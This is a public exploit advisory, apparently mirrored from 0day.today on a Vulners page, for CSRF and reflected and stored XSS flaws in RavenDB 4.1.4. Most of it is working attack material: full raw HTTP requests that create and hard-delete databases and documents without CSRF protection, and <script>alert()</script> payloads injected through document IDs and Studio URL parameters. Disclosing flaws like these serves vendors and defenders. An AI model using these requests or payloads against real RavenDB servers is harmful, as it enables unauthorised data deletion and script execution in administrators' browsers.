Lucene search
K

RavenDB 4.1.4 Cross Site Request Forgery / Cross Site Scripting Vulnerabilities

🗓️ 26 Feb 2019 00:00:00Reported by Ozer GokerType 
zdt
 zdt
🔗 0day.today👁 57 Views

RavenDB 4.1.4 Multiple Vulnerabilities including Cross Site Request Forgery and Cross Site Scriptin

Code
##################################################################################################################################
# Exploit Title: RavenDB 4.1.4 | Multiple Vulnerabilities
# Exploit Author: Ozer Goker
# Vendor Homepage: https://ravendb.net
# Software Link: https://ravendb.net/download
# Version: 4.1.4
##################################################################################################################################

Introduction

Hibernating Rhinos, a global provider of database infrastructure solutions,
empowers Fortune 500 companies and enterprises across the globe to process
online transactions through an open source platform. RavenDB is the
industryas first fully-transactional, NoSQL ACID database that combines
scalability, high-availability, speed and performance. The company produces
two ORM tools, NHibernate and Entity Framework Profilers, that inspect,
analyze and suggest improvements to database access patterns in
applications. Hibernating Rhinos is headquartered in Hadera, Israel with
offices in the U.S. and Poland and extends its reach through over 1500+
customers worldwide.

#################################################################################

Vulnerabilities: CSRF | XSS Reflected & Stored

#################################################################################

CSRF details:

#################################################################################

CSRF1

Create Database

PUT /admin/databases?name=testdb&replicationFactor=1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 120
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302

{"DatabaseName":"testdb","Settings":{},"Disabled":false,"Encrypted":false,"Topology":{"DynamicNodesDistribution":false}}



#################################################################################

CSRF2

Delete Database

DELETE /admin/databases HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302

{"HardDelete":true,"DatabaseNames":["testdb"]}


#################################################################################

CSRF3

Create Document

POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302

{"Commands":[{"Document":{"Name":"...","@metadata":{"@collection":null,"@id":"testdoc"}},"Id":"testdoc","Type":"PUT"}]}

#################################################################################

CSRF4

Delete Document

DELETE /databases/testdb/studio/collections/docs?name=%40all_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302

{"ExcludeIds":[]}

#################################################################################

XSS details:

#################################################################################

XSS1

Create Document

POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 170
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302

{"Commands":[{"Document":{"Name":"...","@metadata":{"@collection":"<script>alert(1)<","@id":"<script>alert(1)</script>"}},"Id":"<script>alert(1)</script>","Type":"PUT"}]}


#################################################################################

XSS2

Delete Document

POST /databases/testdb/bulk_docs HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/studio/index.html
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 85
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302

{"Commands":[{"Id":"<script>alert(1)</script>","Type":"DELETE","ChangeVector":null}]}

#################################################################################

XSS3

URL
http://127.0.0.1:8080/studio/index.html#databases/documents?&database=testdb%3Cscript%3Ealert(2)%3C/script%3E

METHOD
Get

PARAMETER
database

PAYLOAD
<script>alert(2)</script>

#################################################################################

XSS4

URL
http://127.0.0.1:8080/studio/index.html#databases/edit?&database=testdb&id=testdoc%3Cscript%3Ealert(3)%3C/script%3E

METHOD
Get

PARAMETER
id

PAYLOAD
<script>alert(3)</script>

#################################################################################

XSS5

URL
http://127.0.0.1:8080/studio/index.html#databases/status/storage/report?&database=testdb%3Cscript%3Ealert(4)%3C/script%3E

METHOD
Get

PARAMETER
database

PAYLOAD
<script>alert(4)</script>

#################################################################################

#  0day.today [2019-03-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Feb 2019 00:00Current
0.2Low risk
Vulners AI Score0.2
57